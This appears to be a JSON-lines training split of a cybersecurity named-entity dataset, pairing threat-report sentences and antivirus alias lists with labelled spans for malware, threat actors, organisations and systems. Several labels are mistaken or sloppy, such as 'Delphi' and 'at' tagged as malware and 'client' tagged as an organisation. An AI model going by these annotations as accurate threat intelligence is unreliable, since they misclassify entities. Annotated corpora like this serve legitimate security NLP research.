{"text": "In the listed indicators of compromise, we noticed domains that we had seen used in a distinct skimming campaign which didn't seem to be documented yet.", "spans": {"THREAT_ACTOR: distinct skimming campaign": [[86, 112]]}, "info": {"id": "cyner2_train_005746", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Trojan.Script.32120 Trojan.Script.D7D78 Win32.Trojan.WisdomEyes.16070401.9500.9925 Dropped:Trojan.Script.32120 Script.Trojan.Script.Eddq Dropped:Trojan.Script.32120 Trojan.DownLoad1.58708 Dropped:Trojan.Script.32120 Trojan/Win32.Xema.C28003 Dropped:Trojan.Script.32120", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005748", "source": "cyner2_train"}}
{"text": "It also used multiple anti-analysis techniques and the final payload was written in Delphi which is quite unique to the banking trojan landscape.", "spans": {"MALWARE: the final payload": [[51, 68]], "MALWARE: Delphi": [[84, 90]], "MALWARE: the banking trojan": [[116, 134]]}, "info": {"id": "cyner2_train_005749", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cloda4a.Trojan.4db2 Backdoor/W32.EvilBot.49184.D Backdoor/Evilbot.a Backdoor.Evilbot!ON36921kndI Backdoor.Evilbot BKDR_EVILBOT.A Backdoor.Win32.Evilbot.a Trojan.Win32.Evilbot.dgrj Backdoor.Win32.A.Evilbot.49184 Backdoor.Win32.Brat BackDoor.Brat BDS/Brat.A BKDR_EVILBOT.A Trojan[Backdoor]/Win32.Evilbot Win32.Hack.EvilBot.a.kcloud W32/Risk.PNHY-7386 Bck/Evilbot.H PE:Trojan.Evilbot.a!1173766179 Backdoor.Win32.Evilbot W32/EvilBot.A2!tr Backdoor.Win32.Evilbot.AMnQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005750", "source": "cyner2_train"}}
{"text": "Report on APT attacks against Korea by AhnLab.", "spans": {"THREAT_ACTOR: APT": [[10, 13]], "ORGANIZATION: AhnLab.": [[39, 46]]}, "info": {"id": "cyner2_train_005753", "source": "cyner2_train"}}
{"text": "Phones ? November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai .", "spans": {"SYSTEM: Android": [[99, 106]]}, "info": {"id": "cyner2_train_005755", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeSmssV.Trojan Backdoor/W32.Jewdo.14848 Backdoor.Win32.Jewdo!O Backdoor.Jedobot.A4 Trojan.Downloader Backdoor/Jewdo.a WORM_JEWDO.SMD Win32.Backdoor.Dipeok.b W32/Trojan3.PWU Backdoor.Warbot WORM_JEWDO.SMD Win.Downloader.94233-1 Trojan.Win32.Fsysna.diom Trojan.Win32.Jewdo.rvcd Backdoor.Win32.Jewdo.14848 Troj.W32.Fsysna.tnhD BackDoor.Ddoser.432 Backdoor.Win32.Jewdo W32/Trojan.YZKF-7158 Trojan[Backdoor]/Win32.Jewdo Win32.Hack.Jewdo.kcloud Backdoor:Win32/Jedobot.A Trojan.Win32.Fsysna.diom Trojan/Win32.Jewdo.R4708 Backdoor.Jewdo Trojan.Dipeok.A Win32/Dipeok.A Backdoor.Win32.Jewdo.a W32/Jewdo.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005756", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/Delf.aarf Trojan.Win32.Delf.djezh Backdoor.Trojan Malware.XSSC BKDR_DELF.RFY Backdoor.Win32.Delf.aarf Backdoor.Delf!KqYaW6LeN/8 BKDR_DELF.RFY Backdoor:Win32/Dekara.A Backdoor/Win32.Delf Backdoor.Delf Backdoor.Trojan!rem Trojan-Dropper.Delf W32/Delf.AARF!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005757", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 BehavesLike.Win32.Backdoor.cc Backdoor:Win32/Govrat.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005758", "source": "cyner2_train"}}
{"text": "Based on data aggregated from a controlled sinkhole, Fidelis Cybersecurity has observed some notable changes with the primary command and control C&C and conducted in-depth analysis of the secondary C&C Domain Generation Algorithim DGA.", "spans": {"ORGANIZATION: Fidelis Cybersecurity": [[53, 74]], "SYSTEM: C&C Domain Generation Algorithim DGA.": [[199, 236]]}, "info": {"id": "cyner2_train_005759", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.PopUpper!O Worm.Shamli.A3 Trojan.PopUpper.Win32.66 Trojan.ShellStartup.E6CAF2 Win32.Trojan.WisdomEyes.16070401.9500.9949 Trojan.Win32.PopUpper.eg W32.Virut.low6 Trojan.MulDrop3.38938 BehavesLike.Win32.VBObfus.tz Trojan/PopUpper.bi Trojan/Win32.PopUpper Worm:Win32/Shamli.A Trojan.Win32.A.PopUpper.1695744 Trojan.Win32.PopUpper.eg Trojan/Win32.PopUpper.R52146 MAS.Trojan.VB.0879 Win32/VB.ODX Trojan.Win32.PopUpper W32/Popupper.A!tr Trj/Shamli.A Win32/Trojan.41d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005762", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Joiner Trojan.DR.Joiner!+J8FCDf4wyY W32/Dropper.AVHN Backdoor.Colfusion W32/Microjoin.IG Win32/Joiner.U BKDR_JOINER.U Trojan-Dropper.Win32.Joiner.u Trojan.Dropper.Joiner Trojan-PWS.Win32.Atrojan!IK TrojWare.Win32.TrojanDropper.Joiner.U Trojan.Dropper.Joiner Trojan.MulDrop.210 BKDR_JOINER.U TrojanDropper.Win32.Joiner.u Trojan.Dropper.Joiner W32/Dropper.AVHN Dropper/Joiner.44544 Win32/TrojanDropper.Joiner.U Dropper.Joiner.by Trojan-PWS.Win32.Atrojan W32/Joiner.U!tr Dropper.Delf.AW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005763", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Riskware.Confuser! Trojan.Win32.SteamBurglar.dmdrlr Trojan.SteamBurglar.621 Trojan.Katusha.Win32.39398 BehavesLike.Win32.Backdoor.cc TR/Confuser.181248 MSIL/Injector.LTM!tr PWS:MSIL/Stimilini.C Trj/CI.A Trojan.MSIL.Stimilik MSIL6.AKRX Trojan.MSIL.Stimilik.DT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005764", "source": "cyner2_train"}}
{"text": "DotRunpeX is a new injector written in .NET using the Process Hollowing technique and used to infect systems with a variety of known malware families.", "spans": {"MALWARE: DotRunpeX": [[0, 9]], "MALWARE: new injector": [[15, 27]], "SYSTEM: .NET": [[39, 43]], "SYSTEM: systems": [[101, 108]], "MALWARE: malware families.": [[133, 150]]}, "info": {"id": "cyner2_train_005765", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Sdbot.worm Backdoor.Shark.Win32.1896 Backdoor/Shark.ed Win32.Trojan.WisdomEyes.16070401.9500.9984 W32/Backdoor2.ETS Packed.Win32.Black.a Trojan.Win32.Shark.wxsv Packer.W32.Black.lbw7 Packed.Win32..Black.~A Trojan.Packed.650 W32/Sdbot.worm BDS/Shark.N Trojan[Packed]/Win32.Black Win32.Hack.Shark.eu.kcloud Backdoor:Win32/Sharke.H Backdoor.Win32.Shark.1483254 Packed/Win32.Black.C34704 Win32/Shark.RU Backdoor.Win32.Shark W32/Packed.2D18!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005766", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.243F Backdoor.Win32.HacDef.073!O Win32.Trojan.WisdomEyes.16070401.9500.9837 Backdoor.HackDefender Win.Trojan.PcClient-54 Backdoor.Win32.Hupigon.p Trojan.Win32.Maran.enrszy Backdoor.W32.Rbot.lgxa BackDoor.HackDef.239 Backdoor/HacDef.084 BDS/Hacdef.084 Trojan[Backdoor]/Win32.Hupigon Backdoor.Win32.A.Hupigon.41500 Backdoor.Win32.Hupigon.p Trojan/Win32.Xema.C75969 Trojan.Obfuscated!wEhK/9pikzI Trojan-Dropper.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005767", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PSW.Glacier TrojanPWS.Glacier Trojan.PSW.Glacier Trojan/PSW.glacier W32/Glacier.A Win32/GDoor.F BKDR_GLACIER.A Win.Spyware.9313-2 Trojan.PSW.Glacier Trojan-PSW.Win32.Glacier Trojan.PSW.Glacier Trojan.Win32.Glacier.furm Troj.Psw.W32!c Win32.Trojan-qqpass.Qqrob.Hyx Trojan.PSW.Glacier TrojWare.Win32.PSW.Glacier Trojan.PSW.Glacier Trojan.PWS.Glacier Trojan.Glacier.Win32.8 BKDR_GLACIER.A BackDoor-FR.svr W32/Glacier.UXNT-8441 Backdoor/G_Door.b Trojan.PSW.Glacier Trojan.Win32.Glacier Trojan-PSW.Win32.Glacier Win-Trojan/GDoor.262144 BackDoor-FR.svr TrojanPSW.Glacier Trojan.Glacier Win32/PSW.Glacier Trojan.PWS.Glacier!4KEClY9FaHQ Trojan-PWS.Win32.Glacier W32/Glacier.A!tr.pws Win32/Trojan.ff1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005768", "source": "cyner2_train"}}
{"text": "The incident took place in the network of an East Asian company that develops data-loss prevention DLP software.", "spans": {"SYSTEM: the network": [[27, 38]], "ORGANIZATION: East Asian company": [[45, 63]], "SYSTEM: data-loss prevention DLP software.": [[78, 112]]}, "info": {"id": "cyner2_train_005770", "source": "cyner2_train"}}
{"text": "This group was named Winnti", "spans": {"THREAT_ACTOR: group": [[5, 10]], "THREAT_ACTOR: Winnti": [[21, 27]]}, "info": {"id": "cyner2_train_005771", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.P2P.Spear.E Win32.P2P.Spear.E I-Worm.Spear.d.n8 W32/Spear.worm.d!p2p Worm.Spear.Win32.12 W32/Spear.d Win32.P2P.Spear.E Trojan.Win32.Spear.enxr W32/Spear.D W32.HLLW.Yoohoo Spear.M Win32/Spear.G WORM_SPEAR.D P2P-Worm.Win32.Spear.d Worm.P2P.Spear.D Worm.Win32.P2P-Spear.15360[h] Win32.P2P.Spear.E Worm.Win32.Spear.D Win32.P2P.Spear.E Win32.HLLW.Spear.15360 WORM_SPEAR.D W32/Spear.worm.d!p2p W32/Spear.YBIW-1290 Worm/P2P.Spear.e Worm/P2P.Spear Worm.Spear.d.kcloud Worm:Win32/Spear.D Win32.P2P.Spear.E Win32/Spear.worm.40448 Win32.P2P.Spear.E W32/Spear.D Win32/Spear.D Win32.Worm-p2p.Spear.Efao Worm.P2P.Spear.Based W32/Spear.D!worm.p2p Worm.Win32.Spear.aAAZ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005772", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanSpy.Neos.A3 Trojan.Razy.D1F24 TSPY_NEOS.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_NEOS.SM Win.Dropper.Skyneos-6192156-1 Trojan.Win32.KeyLogger.dbjjal TrojWare.MSIL.Spy.Keylogger.agk Trojan.MulDrop3.2465 Win32.Troj.Undef.kcloud TrojanSpy:MSIL/Neos.A Spyware.Keylogger Spyware/Win32.KeyLogger.R30636 Win32.Trojan.Spy.Wqdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005774", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Orsam.A3 TSPY_PATUN.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAV Win32/Petun.B TSPY_PATUN.SMHA BehavesLike.Win32.PWSZbot.nm PWS:MSIL/Petun.A MSIL.Trojan-Spy.Petun.B Trojan.KeyLogger.MSIL Trojan-Spy.Win32.Zbot MSIL/KeyLogger.BA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005776", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Rat.10 Backdoor/W32.RAT.8192.B Backdoor.Rat Backdoor/RAT.10 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.XWXN-0597 Win32/Rat.10 BKDR_RAT.10 Win.Trojan.Rat-4 Backdoor.Rat.10 Backdoor.Win32.RAT.10 Backdoor.Rat.10 Trojan.Win32.RAT.bqzxxm Backdoor.Win32.Rat_10.Svr Backdoor.W32.RAT.10!c Backdoor.Rat.10 Troj/Rat-1.0B Backdoor.Win32.Rat-10._0 Backdoor.Rat.10 BackDoor.Rat.10 Backdoor.RAT.Win32.24 BKDR_RAT.10 BehavesLike.Win32.PUP.xz Backdoor/Rat.10 Trojan[Backdoor]/Win32.RAT Backdoor:Win32/Rat.1_0 Backdoor.Rat.10 Backdoor.Win32.RAT.10 Backdoor.Rat.10 Backdoor.Rat.10 Bck/Rat.1_0 Rat.10 Win32.Backdoor.Rat.Szbj Backdoor.RAT!GoQkQzcwjDw W32/Rat.10!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005779", "source": "cyner2_train"}}
{"text": "The malware is based on a freely-available open-source backdoor – something no one would expect from an alleged state-sponsored malware operator.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: freely-available open-source backdoor": [[26, 63]], "THREAT_ACTOR: malware operator.": [[128, 145]]}, "info": {"id": "cyner2_train_005780", "source": "cyner2_train"}}
{"text": "Proofpoint researchers have recently observed the re-emergence of two malware downloaders that had largely disappeared for several months.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "MALWARE: malware downloaders": [[70, 89]]}, "info": {"id": "cyner2_train_005781", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_GE.1E00D038 Win32.Trojan.WisdomEyes.16070401.9500.9866 TROJ_GE.1E00D038", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005783", "source": "cyner2_train"}}
{"text": "This research has proven valuable for Talos and led the development of better detection methods within the products we support along with the disruption of adversarial operations.", "spans": {}, "info": {"id": "cyner2_train_005784", "source": "cyner2_train"}}
{"text": "Currently, the XData decryption tools are available.", "spans": {"SYSTEM: XData decryption tools": [[15, 37]]}, "info": {"id": "cyner2_train_005785", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Win32.Poison!O Backdoor.Poison Trojan.Heur.E84A91 Win32.Worm.VB.sn Trojan.FakeAV Backdoor.Win32.Poison.cwpk W32.W.VBNA.lsMe Win32.Backdoor.Poison.Pfjd Trojan.AVKill.11304 BehavesLike.Win32.RAHack.ct W32/Trojan.ULXW-4781 Backdoor.Poison.zo Trojan[Backdoor]/Win32.Poison Worm:Win32/Ructo.N Backdoor.Win32.Poison.cwpk Win32/Trojan.d07", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005788", "source": "cyner2_train"}}
{"text": "Astrum was known to be have been exclusively used by the AdGholas malvertising campaign that delivered a plethora of threats including banking Trojans Dreambot/Gozi also known as Ursnif, and detected by Trend Micro as BKDR_URSNIF and RAMNIT TROJ_RAMNIT, PE_RAMNIT.", "spans": {"THREAT_ACTOR: Astrum": [[0, 6]], "THREAT_ACTOR: the AdGholas malvertising campaign": [[53, 87]], "MALWARE: threats": [[117, 124]], "MALWARE: banking Trojans Dreambot/Gozi": [[135, 164]], "MALWARE: Ursnif,": [[179, 186]], "ORGANIZATION: Trend Micro": [[203, 214]]}, "info": {"id": "cyner2_train_005790", "source": "cyner2_train"}}
{"text": "This report reveals a campaign of reconnaissance, phishing, and malware operations that use content and domains made to mimic Chinese language news websites.", "spans": {"THREAT_ACTOR: campaign of reconnaissance, phishing,": [[22, 59]], "THREAT_ACTOR: malware operations": [[64, 82]]}, "info": {"id": "cyner2_train_005791", "source": "cyner2_train"}}
{"text": "It means this was most likely the actual operator.", "spans": {}, "info": {"id": "cyner2_train_005792", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.LVBP Win32.Trojan.WisdomEyes.16070401.9500.9984 W32.SillyFDC TrojanSpy:MSIL/Ruzmoil.A Trojan/Win32.Keylogger.R17549", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005794", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Trojan Win32/Wykcores.A BKDR_MURCY.SM1 PE:Backdoor.Win32.Undef.cnd!1463577[F1] DLOADER.Trojan BKDR_MURCY.SM1 BehavesLike.Win32.Backdoor.qh Win32.Hack.PcClient.al.kcloud Trojan.Barys.955 Backdoor/Win32.Etso Backdoor:Win32/Wykcores.A Trojan-Downloader.Delphi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005795", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Rameh Backdoor/DsBot.ayd Backdoor.Win32.A.DsBot.3918918[UPX] BehavesLike.Win32.BadFile.vc Trojan-Downloader.Win32.Rameh TrojanDownloader:Win32/Rameh.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005796", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.Staser.f Backdoor.Trojan Win.Trojan.Yoddos-2 Trojan.Win32.Delf.ffdi W32.W.Runouce.lgxV BackDoor.MaosBoot.1707 BehavesLike.Win32.Trojan.mm Backdoor/Huigezi.2008.ybi Trojan[Backdoor]/Win32.Hupigon Trojan:Win32/Yoddos.C Backdoor/Win32.Trojan.C2392352 TScope.Malware-Cryptor.SB Trojan.Kryptik!+IjAt1MW7ss Trojan.Win32.SystemHijack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005797", "source": "cyner2_train"}}
{"text": "Attacks involving this Trojan have been noted since February 2017 but peaked in late May.", "spans": {"MALWARE: Trojan": [[23, 29]]}, "info": {"id": "cyner2_train_005798", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9857 Packed.Win32.Black.a Packer.W32.Black.l6cB Trojan.Packed.650 BehavesLike.Win32.Sdbot.tc BehavesLikeWin32.ExplorerHijack W32/Packed.2D18!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005800", "source": "cyner2_train"}}
{"text": "Our researchers noted that IcedID has a modular malicious code with modern banking Trojan capabilities comparable to malware such as the Zeus Trojan.", "spans": {"ORGANIZATION: Our researchers": [[0, 15]], "MALWARE: IcedID": [[27, 33]], "MALWARE: modular malicious code": [[40, 62]], "MALWARE: modern banking Trojan": [[68, 89]], "MALWARE: malware": [[117, 124]], "MALWARE: the Zeus Trojan.": [[133, 149]]}, "info": {"id": "cyner2_train_005801", "source": "cyner2_train"}}
{"text": "For example, most organizations have little to no DNS restrictions or security monitoring for DNS activity.", "spans": {"SYSTEM: DNS": [[50, 53], [94, 97]]}, "info": {"id": "cyner2_train_005802", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Downloader.Nekill.al Trojan.DL.Nekill.X Adware.Rugo Trojan-Downloader.Win32.Nekill.al Heuristic.BehavesLike.Win32.Downloader.J Trojan-Downloader.Win32.Nekill!IK Adware/MsLock.qg Trojan-Downloader.Nekill.al Adware.Rugo Trojan-Downloader.Win32.Nekill", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005805", "source": "cyner2_train"}}
{"text": "These changes not only make it more difficult for the victim to identify what files have been encrypted, but also may thwart security protections currently in place for the CryptoWall threat.", "spans": {"MALWARE: CryptoWall threat.": [[173, 191]]}, "info": {"id": "cyner2_train_005811", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Barys.D1CD2 Win32.Trojan.WisdomEyes.16070401.9500.9968 Trojan.MSIL.Inject.abuiq Trojan/Windef.hm DDoS:Win32/Darktima.A Trojan.MSIL.Inject.abuiq TrojanFakeAV.Windef Trj/CI.A Win32.Trojan.Inject.dfju Trojan.DR.MSIL!M+jYeJcGakI Trojan.Win32.FakeAV W32/Dropper.FBQ!tr Win32/Trojan.f70", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005812", "source": "cyner2_train"}}
{"text": "Consider the following phish delivered to the email address displayed on the bank's website.", "spans": {}, "info": {"id": "cyner2_train_005813", "source": "cyner2_train"}}
{"text": "Eltima was very responsive and maintained an excellent communication with us throughout the incident.", "spans": {}, "info": {"id": "cyner2_train_005815", "source": "cyner2_train"}}
{"text": "Beginning in December 2016, unconnected Middle Eastern human rights activists began to receive spearphishing messages in English and Persian that were not related to any previously-known groups.", "spans": {"ORGANIZATION: human rights activists": [[55, 77]], "THREAT_ACTOR: previously-known groups.": [[170, 194]]}, "info": {"id": "cyner2_train_005817", "source": "cyner2_train"}}
{"text": "This campaign appears to be directly related to the launch and the ensuing discussion of North Korean missile technology.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: North Korean missile technology.": [[89, 121]]}, "info": {"id": "cyner2_train_005818", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downldr2.FYWH Hacktool.Rootkit Win32/Kerproc.A Win.Trojan.Rootkit-5417 Trojan.Win32.NtRootKit.duatym Trojan.DownLoader12.58402 W32/Downloader.QURR-6406 Trojan[Rootkit]/Win32.Small TrojanDropper:Win32/Bodsuds.A Dropper/Win32.Downloader.R143536 Rootkit.Win32.SMA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005819", "source": "cyner2_train"}}
{"text": "While the current campaign from this attacker has been active for a couple of months, there is evidence of activity by this attacker as far back as 2013, employing other backdoors such as Saker, Netbot and DarkStRat", "spans": {"THREAT_ACTOR: campaign": [[18, 26]], "THREAT_ACTOR: attacker": [[37, 45], [124, 132]], "MALWARE: backdoors": [[170, 179]], "MALWARE: Saker, Netbot": [[188, 201]], "MALWARE: DarkStRat": [[206, 215]]}, "info": {"id": "cyner2_train_005823", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.DownLoader6.51149 RKIT/Mon.A Backdoor:Win32/Feljina.B Trojan.Graftor.DE2AD TScope.Trojan.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005824", "source": "cyner2_train"}}
{"text": "It is spread presumably via ShellShock vulnerabilities.", "spans": {"VULNERABILITY: ShellShock vulnerabilities.": [[28, 55]]}, "info": {"id": "cyner2_train_005825", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.HiddenTear.H Ransom.Ryzerlo.A3 Trojan.Ransom.HiddenTear.H Ransom.HiddenTear Ransom_CRYPTEAR.SM0 Trojan.Win32.Hesv.crqo Trojan.Ransom.HiddenTear.H Trojan.Ransom.HiddenTear.H Trojan.Encoder.10598 Ransom_CRYPTEAR.SM0 Ransom:MSIL/Ryzerlo.A Trojan.Win32.Hesv.crqo Trojan.Ransom.HiddenTear.H Trj/GdSda.A Win32.Trojan.Fakedoc.Auto Trojan-Ransom.HiddenTear Win32/Trojan.504", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005826", "source": "cyner2_train"}}
{"text": "However, recently, we have observed cases where PoisonIvy with expanded features in its communication function were used for attacks.", "spans": {"MALWARE: PoisonIvy": [[48, 57]]}, "info": {"id": "cyner2_train_005827", "source": "cyner2_train"}}
{"text": "They might be Jaff ransomware or might be Dridex banking Trojan or Trickbot banking Trojan.", "spans": {"MALWARE: Jaff ransomware": [[14, 29]], "MALWARE: Dridex banking Trojan": [[42, 63]], "MALWARE: Trickbot banking Trojan.": [[67, 91]]}, "info": {"id": "cyner2_train_005829", "source": "cyner2_train"}}
{"text": "It turns out that this campaign had an association to 2016 Fancy Bear activity previously identified by the German Federal Office for the Protection of the Constitution BfV.", "spans": {"THREAT_ACTOR: campaign": [[23, 31]], "THREAT_ACTOR: Fancy Bear": [[59, 69]], "ORGANIZATION: the German Federal Office for the Protection of the Constitution BfV.": [[104, 173]]}, "info": {"id": "cyner2_train_005831", "source": "cyner2_train"}}
{"text": "Also of particular interest from an attribution obfuscation perspective is direct IP crossover with previous Dynamic DNS domains associated with known CN-APT activity.", "spans": {"THREAT_ACTOR: CN-APT activity.": [[151, 167]]}, "info": {"id": "cyner2_train_005832", "source": "cyner2_train"}}
{"text": "It has strong behavioral ties to Ke3chang and is being used in an ongoing attack campaign against Indian embassy personnel worldwide.", "spans": {"MALWARE: Ke3chang": [[33, 41]], "THREAT_ACTOR: attack campaign": [[74, 89]], "ORGANIZATION: Indian embassy personnel worldwide.": [[98, 133]]}, "info": {"id": "cyner2_train_005833", "source": "cyner2_train"}}
{"text": "It involves modifying browser proxy configurations and capturing traffic between a client and a server, acting as Man-In-The-Middle.", "spans": {"ORGANIZATION: client": [[83, 89]], "ORGANIZATION: server,": [[96, 103]]}, "info": {"id": "cyner2_train_005834", "source": "cyner2_train"}}
{"text": "Late last year, a wave of cyber-attacks hit several critical sectors in Ukraine.", "spans": {"ORGANIZATION: critical sectors": [[52, 68]]}, "info": {"id": "cyner2_train_005836", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.LocktETTc.Worm Trojan.Miuref.S21958 Trojan.MalPack Variant.Symmi.m8Nr Win32.Trojan.WisdomEyes.16070401.9500.9995 BehavesLike.Win32.Miuref.tc Trojan.Win32.Miuref Trojan.Miuref.3 Trojan:Win32/Miuref.B Win32.Trojan.Miuref.Wqws Win32/Trojan.eb2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005837", "source": "cyner2_train"}}
{"text": "Its primary institutional targets have included government bodies, diplomatic institutions, and military forces and installations in NATO member states and certain Eastern European countries.", "spans": {"ORGANIZATION: government bodies, diplomatic institutions,": [[48, 91]], "ORGANIZATION: military forces": [[96, 111]], "ORGANIZATION: NATO member states": [[133, 151]], "ORGANIZATION: Eastern European countries.": [[164, 191]]}, "info": {"id": "cyner2_train_005838", "source": "cyner2_train"}}
{"text": "After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks.", "spans": {"ORGANIZATION: the German Bundestag": [[26, 46], [161, 181]], "ORGANIZATION: BSI": [[91, 94]], "ORGANIZATION: government networks": [[115, 134]], "SYSTEM: own networks.": [[190, 203]]}, "info": {"id": "cyner2_train_005839", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Graftor.D5ABC0 BackDoor.IRC.Skynet.69 BehavesLike.Win32.AdwareLinkury.dc W32/Trojan.ETUC-5276 Trojan[Spy]/Win32.Zbot Trojan:Win32/Zeeborot.A Trj/CI.A BackDoor.Skynet! Trojan.Win32.Zeeborot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005840", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Darkhotel.692224 Trojan.Inexsmar.r5 Trojan/Inexsmar.a Trojan.Zusy.D25651 W32/Trojan.GJSD-2947 Win32/Inexsmar.A TROJ_INEXSMAR.SMA Trojan.Win32.Darkhotel.c Trojan.Win32.Darkhotel.duiemo Trojan.Win32.Z.Darkhotel.692224[h] Trojan/Win32.Darkhotel Trojan:Win32/Inexsmar.A Troj.W32.Darkhotel.c!c Trojan/Win32.DarkHotel Win32.Trojan.Darkhotel.Pftk Trojan.Darkhotel! Trojan.Win32.Inexsmar W32/Darkhotel.C!tr Trojan.Win32.Darkhotel.c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005841", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Inject.FC.363 Trojan.MSILKrypt.57 BKDR_HPNOANCOOE.SM Win32.Trojan.WisdomEyes.16070401.9500.9998 BKDR_HPNOANCOOE.SM Trojan.DownLoader24.26511 Trojan.Injector.Win32.512453 Trojan.MSIL.Crypt Trojan.MSIL.fwua TR/Dropper.MSIL.uuodb Trojan:MSIL/Kuhaname.A Trojan/Win32.MSIL.C957690 Trojan.Malicious Trojan.Injector!2xVDVY5re4U Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005843", "source": "cyner2_train"}}
{"text": "Category: Unit 42 Tags: EITest, HoeflerText, malware, RAT", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "MALWARE: EITest, HoeflerText, malware, RAT": [[24, 57]]}, "info": {"id": "cyner2_train_005845", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Android.Downloader.N Android.Trojan.Downloader.KY Other:Android.Reputation.2 Android.Trojan.Downloader.KY A.L.Rog.BlackCert Android.HiddenAds.171.origin Android.Trojan.Downloader.KY Android-Trojan/Boosad.3b718 a.gray.hiddendown.g Trojan.AndroidOS.Hiddenapp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005847", "source": "cyner2_train"}}
{"text": "A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label the Lotus Blossom Operation likely named for the debug string present in much of the Elise codebase since at least 2012: d:\\lstudio\\projects\\lotus\\…", "spans": {"ORGANIZATION: Palo Alto Networks": [[44, 62]], "THREAT_ACTOR: Lotus Blossom Operation": [[124, 147]], "MALWARE: Elise": [[205, 210]], "MALWARE: at": [[226, 228]]}, "info": {"id": "cyner2_train_005848", "source": "cyner2_train"}}
